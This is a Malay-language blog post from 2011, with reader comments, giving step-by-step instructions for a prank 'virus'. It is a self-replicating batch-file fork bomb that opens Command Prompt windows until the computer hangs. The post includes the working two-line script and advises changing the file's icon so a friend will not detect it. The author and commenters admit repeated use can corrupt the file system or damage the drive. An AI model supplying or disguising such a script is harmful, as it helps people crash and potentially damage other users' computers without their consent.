Tuesday, 12 July 2011

Teruskan Virus Mereka

Kali ne kita akan melakukan satu lagi trik virus, untuk melakukan virus ini adalah sangat mudah dan hanya memerlukan masa kurang daripada 1 minit. Terlalu cepat kah? Tetapi anda harus mempercayainya kerana virus ini tidak memerlukan program yang banyak.




Cara Melakukannya


1. Buka Notepad anda. Tak tau rujuk >SINI<

2. Salin perkataan di bawah ke dalam Notepad anda.

Start Virus.bat
Virus.bat

3. Save sebagai namafail.bat dan tukar file type dari text document ke All Files. Caranya rujuk >SINI<

4. Untuk menjadikan ianya lebih berkesan tukar icon file kepada sesuatu yang tidak dapat dikesan oleh kawan anda. Caranya rujuk >SINI<

Virus palsu ini akan mengakibatkan Command Prompt anda terbuka secara automatik dalam jumlah banyak sehingga menyebabkan komputer hang. Anda tiada pilihan lain kecuali shut down laptop/PC anda dan on kan semula.



PERINGATAN : JANGAN LAKUKAN BENDA INI BERULANG KALI KE ATAS KOMPUTER YANG SAMA KERANA BOLEH MENGAKIBATKAN FILE SISTEM ANDA ROSAK.



p/s : kebosanan melanda lagi...

4 comments:

..cik gugu.. said...

errr ni tuk men2 ke pe?

muz said...

@..cik gugu..
Untuk main2 je ne....bukan virus betul pun... :)

vampire's lovex said...

tapi kalau buat banyak2 kali memang betol2 jadi virus kan...wahhhhaaaa,bahaya..bahaya..

muz said...

@vampire's lovex
Ya VL sebab sistem fail akan corrupt dan mungkin kemungkinan menyebabkan HDD rosak...hehe